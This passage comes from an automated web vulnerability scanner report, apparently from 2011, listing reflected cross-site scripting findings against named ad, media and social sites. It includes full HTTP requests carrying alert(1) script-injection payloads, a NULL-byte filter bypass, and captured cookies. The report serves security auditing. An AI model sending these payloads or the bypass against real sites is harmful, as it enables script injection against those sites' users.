var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',77d71";alert(1)//149bbdc5fd3';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,77d71";alert(1)//149bbdc5fd3;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


                                               
...[SNIP]...

4.119. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6798e'%3balert(1)//ac9423e96e6 was submitted in the q parameter. This input was echoed as 6798e';alert(1)//ac9423e96e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=6798e'%3balert(1)//ac9423e96e6&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:41 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='6798e';alert(1)//ac9423e96e6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=6798e';alert(1)//ac9423e96e6;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd
...[SNIP]...

4.120. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70159"%3balert(1)//d878d3d5c5 was submitted in the q parameter. This input was echoed as 70159";alert(1)//d878d3d5c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=70159"%3balert(1)//d878d3d5c5&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:41 GMT
Content-Length: 2432
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='70159";alert(1)//d878d3d5c5';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=70159";alert(1)//d878d3d5c5;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


                                               
...[SNIP]...

4.121. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload da811(a)88448242ef8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/?q=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&callback=FFEAA0CC93007da811(a)88448242ef8 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w08g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 6223
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:24:01 GMT
Connection: close

if (typeof(FFEAA0CC93007da811(a)88448242ef8) == 'function'){FFEAA0CC93007da811(a)88448242ef8({"Title":"'Game Of Thrones': About Tonight's Big Spoiler...","Ucid":"D3FCFFFF0002D51D001B01477BA2","Thumbnails":{"CustomTemplate":"http:\/\/filesll.flu
...[SNIP]...

4.122. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1e121%3balert(1)//f8f1d10d0d7 was submitted in the callback parameter. This input was echoed as 1e121;alert(1)//f8f1d10d0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage?q=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&callback=F65FF440430071e121%3balert(1)//f8f1d10d0d7 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 507
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:24:06 GMT
Connection: close

if (typeof(F65FF440430071e121;alert(1)//f8f1d10d0d7) == 'function'){F65FF440430071e121;alert(1)//f8f1d10d0d7({"CommentCount":0,"CommentData":null,"GainRatingCount":0,"IsFirstPage":false,"IsInvisible":false,"IsLastPage":false,"OverallFiveStarRating":0,"
...[SNIP]...

4.123. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload aa1cc%3balert(1)//f751d8e6f88 was submitted in the callback parameter. This input was echoed as aa1cc;alert(1)//f751d8e6f88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services?earlyServicesOnly=false&callback=F3230BE7B3007aa1cc%3balert(1)//f751d8e6f88 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w07g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 9655
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:23:59 GMT
Connection: close

if (typeof(F3230BE7B3007aa1cc;alert(1)//f751d8e6f88) == 'function'){F3230BE7B3007aa1cc;alert(1)//f751d8e6f88([{"__type":"ExternalShareServiceData","LargeThumbnailUrl":null,"Sections":"","ShareType":"flux","SystemName":"flux","ThumbnailUrl":"http:\/\/st
...[SNIP]...

4.124. http://digg.com/tools/diggthis.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a7b2"><script>alert(1)</script>874123e3b2f was submitted in the REST URL parameter 1. This input was echoed as 5a7b2"><script>alert(1)</script>874123e3b2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%005a7b2"><script>alert(1)</script>874123e3b2f/diggthis.js HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=8144478524238096536%3A211; expires=Tue, 14-Jun-2011 11:23:31 GMT; path=/; domain=digg.com
Set-Cookie: d=5634eb57baa7c24c984b568442a99c3c7b2efae6ecb9a20afd4dcf647acdc70f; expires=Sat, 12-Jun-2021 21:31:11 GMT; path=/; domain=.digg.com
X-Digg-Time: D=347865 10.2.128.186
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17743

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%005a7b2"><script>alert(1)</script>874123e3b2f/diggthis.js.rss">
...[SNIP]...

4.125. http://digg.com/tools/diggthis.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f62e6"><script>alert(1)</script>b012967b31b was submitted in the REST URL parameter 2. This input was echoed as f62e6"><script>alert(1)</script>b012967b31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/diggthis.js%00f62e6"><script>alert(1)</script>b012967b31b HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=8434960700203493528%3A211; expires=Tue, 14-Jun-2011 11:23:35 GMT; path=/; domain=digg.com
Set-Cookie: d=dd1a33bf76cd1a3a30c4c728bf3e1f3a045257e336ebe233d2fdbe5db31f50e8; expires=Sat, 12-Jun-2021 21:31:15 GMT; path=/; domain=.digg.com
X-Digg-Time: D=746448 10.2.130.111
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 15097

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00f62e6"><script>alert(1)</script>b012967b31b.rss">
...[SNIP]...

4.126. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 878e8<script>alert(1)</script>ae45a7426be was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&uid=KxwltwQfcXn0PkkN_1000014620118878e8<script>alert(1)</script>ae45a7426be&xy=44%2C2676&wh=1065%2C926&vchannel=Centro&cid=Zenith-Sonic&iad=1307962922145-25851937336847188&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=545B7F561D3473D82A16C9A7FB3C8C63; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 152
Date: Mon, 13 Jun 2011 11:02:10 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("KxwltwQfcXn0PkkN_1000014620118878e8<script>alert(1)</script>ae45a7426be");

4.127. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b845<script>alert(1)</script>d344801ae69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k9b845<script>alert(1)</script>d344801ae69/zvc4iwz-e.css?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Host: fonts.gawker.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=76a913a1dd4b346f61ad2a370c8c38ac; __qca=P0-500669253-1305981292998; __utmz=76883914.1305981293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76883914.1133493516.1305981293.1305981293.1305981293.1; ____GSV=dynamic

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:23:25 GMT
Server: nginx/0.8.36
X-Runtime: 0.001039
Content-Length: 68

Not Found: /k9b845<script>alert(1)</script>d344801ae69/zvc4iwz-e.css

4.128. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ef81<script>alert(1)</script>595f97f776b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-e.css9ef81<script>alert(1)</script>595f97f776b?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Host: fonts.gawker.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=76a913a1dd4b346f61ad2a370c8c38ac; __qca=P0-500669253-1305981292998; __utmz=76883914.1305981293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76883914.1133493516.1305981293.1305981293.1305981293.1; ____GSV=dynamic

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:23:28 GMT
Server: nginx/0.8.36
X-Runtime: 0.000900
Content-Length: 68

Not Found: /k/zvc4iwz-e.css9ef81<script>alert(1)</script>595f97f776b

4.129. http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://geo.gorillanation.com
Path:   /geo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23a25'%3balert(1)//994d27fcf7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23a25';alert(1)//994d27fcf7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /geo.php?dynamic=0&website_id=/23a25'%3balert(1)//994d27fcf7f4600 HTTP/1.1
Host: geo.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:22:42 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
Expires: Sat, 3 Sep 1977 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Served-By: app2v.lax1
Content-Length: 319
Content-Type: application/json; charset="utf-8"
X-Cache: MISS from pxy1v.lax1
X-Cache-Lookup: MISS from pxy1v.lax1:80
Via: 1.0 pxy1v.lax1:80 (squid/2.6.STABLE6)
Connection: close

gn_country='US';ip='173.193.214.243';exdate=new Date();exdate.setDate(exdate.getDate()+ 7);document.cookie="gn_country=US; expires=" + exdate.toGMTString() + "; path=/";document.write('<script src="http://cdn.triggertag.gorillanation.com/js//23a25';alert(1)//994d27fcf7f4600_US.php" type="text/javascript">
...[SNIP]...

4.130. http://geo.gorillanation.com/geo.php [website_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://geo.gorillanation.com
Path:   /geo.php

Issue detail

The value of the website_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b6c'%3balert(1)//6c8ffe311ff was submitted in the website_id parameter. This input was echoed as 95b6c';alert(1)//6c8ffe311ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /geo.php?dynamic=0&website_id=460095b6c'%3balert(1)//6c8ffe311ff HTTP/1.1
Host: geo.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:22:41 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
Expires: Sat, 3 Sep 1977 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Served-By: app1v.lax1
Content-Length: 318
Content-Type: application/json; charset="utf-8"
X-Cache: MISS from pxy1v.lax1
X-Cache-Lookup: MISS from pxy1v.lax1:80
Via: 1.0 pxy1v.lax1:80 (squid/2.6.STABLE6)
Connection: close

gn_country='US';ip='173.193.214.243';exdate=new Date();exdate.setDate(exdate.getDate()+ 7);document.cookie="gn_country=US; expires=" + exdate.toGMTString() + "; path=/";document.write('<script src="http://cdn.triggertag.gorillanation.com/js/460095b6c';alert(1)//6c8ffe311ff_US.php" type="text/javascript">
...[SNIP]...

4.131. http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hollywoodcrush.mtv.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc7e</script><script>alert(1)</script>4e5acb99ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

